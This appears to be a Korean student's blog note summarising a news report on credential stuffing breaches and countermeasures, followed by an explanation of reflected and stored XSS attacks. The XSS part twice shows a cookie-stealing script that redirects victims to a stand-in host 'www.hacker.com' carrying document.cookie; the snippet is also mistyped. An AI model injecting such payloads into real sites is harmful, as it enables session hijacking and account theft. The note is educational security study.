사이버 공격으로 인한 빈번한 개인정보 유출사고, XSS공격이란?(24/01/15)

헤드라인

[이슈플러스]'단순하지만 강력'…크리덴셜 스터핑에 계속 뚫리는 보안

 

기사링크 : https://n.news.naver.com/article/newspaper/030/0003276017?date=20250115

본문

사용자 계정·비밀번호 빼내
여러 사이트에 동일하게 적용
또다른 정보 탈취 '악의 고리'
계정별 고유 비번·2단계 인증
추가 보안체계 도입 서둘러야

출처 : 전자뉴스

연말·연초 사이버 공격이 잇따르면서 개인정보 유출 사고가 빈번하게 일어나고 있다. 특히 해커가 즐겨 쓰는 '크리덴셜 스터핑(Credential Stuffing)' 공격방식이 잊을 만하면 등장함에 따라 각별한 주의와 대응책 마련이 요구된다.

GS리테일은 지난달 27일부터 지난 4일까지 홈페이지가 해커의 공격을 받아 9만여명의 고객 개인정보가 탈취됐다고 밝혔다. 이번 공격으로 고객의 이름, 성별, 생년월일, 연락처, 주소, 아이디, 이메일 등 7개 항목의 개인정보가 유출된 것으로 추정된다. GS리테일은 해킹을 시도하는 인터넷프로토콜(IP)을 차단하고 로그인할 수 없도록 잠금 처리했으며, 개인정보가 표시된 페이지를 확인할 수 없도록 임시 폐쇄했다고 설명했다.

GS리테일은 해커 공격방식으로 크리덴셜 스터핑을 지목했다. 크리덴셜 스터핑은 공격자가 사용자 계정·비밀번호 등을 사전에 취득한 후, 사용자가 이용할 만한 사이트에 이를 동일하게 사용해 성공할 때까지 로그인을 시도하는 대입(Stuffing) 공격 방식을 말한다.

크리덴셜 스터핑은 매우 단순한 반복형 공격 방식이지만 효과적이어서 해커의 단골 수법으로 통한다. 실제 개인정보 유출 사고를 조사한 결과, 크리덴셜 스터핑 수법을 사용한 것으로 드러나기도 했다.

지난해 개인정보보호위원회의 처분한 개인정보 유출사고를 살펴보면, '대성마이맥' 운영사 디지털대성은 크리덴셜 스터핑과 홈페이지 게시판에 대한 '크로스사이트 스크립팅(XSS)' 공격으로 회원 9만5000여명의 개인정보가 유출됐다.

한국고용정보원과 한국장학재단도 크리덴셜 스터핑 공격을 당했다. 한국고용정보원의 구인·구직 사이트 '워크넷'과 한국장학재단 홈페이지는 크리덴셜 스터핑 공격을 받아 각각 23만6000여명, 3만2000여명의 개인정보가 해커의 손아귀에 들어갔다.

크리덴셜 스터핑이 대중적으로 잘 알려진 것은 2020년 유명 연예인을 대상으로 한 스마트폰 해킹 사건 때문이다. 해커가 연예인의 개인정보를 입수해 클라우드 계정에 접근, 개인정보를 빼갔다. 당초 스마트폰 자체를 해킹한 것으로 의심했으나, 크리덴셜 스터핑에 무게가 실렸다.

해외로 눈을 돌리면, 지난해 6월 클라우드 데이터 플랫폼 스노우플레이크의 고객사가 크리덴셜 스터핑 공격을 받아 티켓마스터, 산탄데르은행, 어드밴스오토파츠 등 여러 기업에서 수억건의 데이터가 탈취되기도 했다.

더욱이 크리덴셜 스터핑은 기존에 탈취한 계정정보를 이용하는 공격 방식이기에, 끊임없이 발생하는 개인정보 유출 사고가 후속 피해로 이어질 가능성이 크다. 보안 전문가들은 크리덴셜 스터핑 공격 성공률을 통상 0.1~0.2%로 보는 데 결코 낮은 수치가 아니라고 강조한다. 100만건의 유출 정보 가운데 1만~2만개 계정에 접근할 수 있어도 추가 피해는 눈덩이처럼 불어날 수 있어서다.

SK쉴더스는 '2025년 보안 위협 전망 보고서'에서 2023년 발생한 대규모 데이터 유출 사고 영향으로 2024년 크리덴셜 스터핑이 성행했다고 분석했다. 대개 사용자가 여러 사이트에서 동일한 로그인 정보를 사용하는 경우가 많아, 한 곳에서 유출된 정보는 다른 계정에도 쉽게 접근할 수 있는 취약점이 발생하기 때문이다. 개인정보 유출이 크리덴셜 스터핑 공격으로 이어져 또 다른 정보를 탈취하는 악의 고리가 생기는 것이다.

크리덴셜 스터핑 대응책으론 계정별 고유 비밀번호 사용, 2단계 인증(2FA) 활성화, 강력한 비밀번호 관리자 사용, 정기적인 비밀번호 변경, 로그인 시도 제한 및 캡차(CAPTCHA) 사용 등이 제시된다.

실제 크리덴셜 스터팅 공격을 당해 개인정보를 유출한 기업·기관 가운데 24시간 감시·모니터링 체계는 갖춘 곳도 있었다. 그러나 로그인 시도 및 실패율이 증가하는 형태의 크리덴셜 스터핑 공격에 대응할 수 있는 보안대책은 미흡했던 것으로 확인됐다. 로그인 시도가 일정 횟수 이상 실패할 경우 계정을 잠그거나 암호 이외에 문자·일회용패스워드(OTP) 인증 추가 등 2단계 이상 인증 도입으로 추가 보안 체계가 필요했다는 얘기다.

전승주 에프엔에스벨류 대표는 “지난 2020년 한 해 동안 전 세계 금융업계를 대상으로 총 41억건의 크리덴셜 스터핑 공격이 발생한 것을 보면 그 심각성을 알 수 있다”면서 “서비스 제공자인 기업이 고객정보 보호를 위한 노력을 더 이상 비용이 아닌 '투자'로 보는 인식 전환이 시급하다”고 강조했다.

크리덴셜 스터핑 대응책

기사 내용의 수치화, 인사이트

연말·연초 사이버 공격이 잇따르면서 개인정보 유출 사고가 빈번하게 일어나고 있다. 특히 해커가 즐겨 쓰는 '크리덴셜 스터핑(Credential Stuffing)' 공격방식이 잊을 만하면 등장함에 따라 각별한 주의와 대응책 마련이 요구된다.

GS리테일은 지난달 27일부터 지난 4일까지 홈페이지가 해커의 공격을 받아 9만여명의 고객 개인정보가 탈취됐다고 밝혔다.

GS리테일은 해커 공격방식으로 크리덴셜 스터핑을 지목했다.

'대성마이맥' 운영사 디지털대성은 크리덴셜 스터핑과 홈페이지 게시판에 대한 '크로스사이트 스크립팅(XSS)' 공격으로 회원 9만5000여명의 개인정보가 유출

한국고용정보원과 한국장학재단도 크리덴셜 스터핑 공격을 당했다.

한국고용정보원의 구인·구직 사이트 '워크넷'과 한국장학재단 홈페이지는 크리덴셜 스터핑 공격을 받아 각각 23만6000여명, 3만2000여명의 개인정보가 해커의 손아귀에 들어갔다.
크리덴셜 스터핑이 대중적으로 잘 알려진 것은 2020년 유명 연예인을 대상으로 한 스마트폰 해킹 사건

지난해 6월 클라우드 데이터 플랫폼 스노우플레이크의 고객사가 크리덴셜 스터핑 공격을 받아 티켓마스터, 산탄데르은행, 어드밴스오토파츠 등 여러 기업에서 수억건의 데이터가 탈취

크리덴셜 스터핑은 기존에 탈취한 계정정보를 이용하는 공격 방식이기에, 끊임없이 발생하는 개인정보 유출 사고가 후속 피해로 이어질 가능성이 크다.

보안 전문가들은 크리덴셜 스터핑 공격 성공률을 통상 0.1~0.2%로 보는 데 결코 낮은 수치가 아니라고 강조한다. 100만건의 유출 정보 가운데 1만~2만개 계정에 접근할 수 있어도 추가 피해는 눈덩이처럼 불어날 수 있어서

크리덴셜 스터핑 대응책으론 계정별 고유 비밀번호 사용, 2단계 인증(2FA) 활성화, 강력한 비밀번호 관리자 사용, 정기적인 비밀번호 변경, 로그인 시도 제한 및 캡차(CAPTCHA) 사용 등이 제시

“서비스 제공자인 기업이 고객정보 보호를 위한 노력을 더 이상 비용이 아닌 '투자'로 보는 인식 전환이 시급하다”

추가조사한 내용

크로스사이트 스크립팅(XSS) 공격이 무엇인가?

크로스 사이트 스크립팅은 웹사이트에 악성 스크립트를 주입하는 행위를 말합니다.

크로스 사이트 스크립팅 공격은 크게 두가지로 나눌 수 있는데,

Reflected XSS와 Stored XSS 입니다.

 

Reflected XSS 공격

1. 해커가 사용자에게 이메일로 “은행 공지, 보안문제가 많으니 클릭해서 보안강화하기 바람” 이라는 제목으로 링크를 보내고 링크에는 세션 쿠키를 탈취하는 코드를 심어둡니다.

2. 사용자는 스크립트코드가 삽입된 요청을 웹 애플리케이션에 전송하고

3. 웹 애플리케이션은 스크립트를 반사해서 사용자의 브라우저에서 실행되게 합니다.

4. 실행되면 해커에게 세션, 쿠키가 전송되고 해커는 사용자권한으로 접속합니다.

 

Reflected XSS 공격의 예시는 해커가 사용자에게 메일로 긴급한 내용의 메일을 보내 링크를 클릭하게 만듭니다.

링크 안에는 다음과 같은 스크립트가 작성되어 있습니다.

<script>
	document.loaction = `www.hacker.com?{document.cookie}`
</script>

 

이러면 사용자는 스크립트를 실행하게 되고, 공격자가 만들어둔 웹페이지로 이동하여 ?뒤에 있는 쿠키를 공격자에게 탈취 당하게 됩니다.

 

Stored XSS 공격

1. 서버 게시판에 악성 스크립트 코드 작성

2. 사용자가 게시글을 읽음

3. 악성 스크립트 코드 실행

4. 공격자가 사용자의 쿠키 탈취

 

Stored XSS 공격의 예시는 해커가 어떤 게시판에 사용자의 쿠키를 빼내는 악성 스크립트

<script>
	document.loaction = `www.hacker.com?{document.cookie}`
</script>

를 작성하여 게시글에 올려두면 사용자가 그 게시글을 눌러봤을 때 악성스크립트가 실행되어

사용자는 쿠키를 공격자에게 탈취 당하게 됩니다.

 

오늘 내용 요약

사이버 공격이 잇따르면서 개인정보 유출사고가 빈번하게 일어나고 있습니다. GS리테일의 크리덴셜 스터핑, “대성마이맥”의 크리덴셜 스터핑, 크로스사이트스크립팅(XSS) 공격으로 많은 회원들의 정보가 유출되었습니다.

크리덴셜 스터핑 공격 성공률을 0.1~0.2%로 보는데 결코 낮은 수치가 아니고 이를 대응하기 위한 대응책으로는 계정별 고유 비밀번호 사용, 2단계 인증(MFA)활성화, 강력한 비밀번호 변경, 로그인 시도 제한 및 캡차(CAPTCHA) 사용 등이 있습니다.

크리덴셜 스터핑은 기존에 탈취한 아이디, 비밀번호를 가지고 다른 사이트에 대입해보는 공격 방식이고 XSS 공격은 악성 스크립트를 사용자가 실행하게 만들어 사용자의 쿠키를 탈취하거나 다른 행동을 하게 만드는 방법입니다.

이는 단순하지만 웹보안 10대 취약점에 항상 들어갈 정도로 강력한 공격입니다.

 

스크랩 후 내 생각

해킹 공격에 대해 알아볼 수록 이것을 생각해내는 사람도 대단하고 이걸 막아낼 방법을 찾아내는 사람도 대단하다고 생각이 들었고, 완벽히 막아낼 수는 없다는 것에 조금 불안함을 느꼈고, 제 정보도 알게 모르게 다른 사람에게 들어갔을 것이라는 생각이 들었습니다.

크리덴셜 스터핑 공격은 제가 사이트마다 다른 비밀번호를 사용하여 조금 예방을 할 수 있을 것 같은데, 사실 사이트마다 다른 비밀번호를 일일히 기억하기 힘들어 무언가 대책이 필요하다고 생각이 들었고, XSS 공격을 예방하기 위해 앞으로 서비스를 제작할 때 시큐어 코딩 기법을 적용하여 최대한 예방해야 겠다는 생각을 했습니다.

 

현직자에게 질문

-

 

추가자료 링크

https://nordvpn.com/ko/blog/xss-attack/

https://www.youtube.com/watch?v=EOdCTZQAClo

https://blog.naver.com/sk_shieldus/223325311391

https://www.youtube.com/watch?v=jvS45jdz1ao&t=169s

https://www.youtube.com/watch?v=cehEkpWl7fg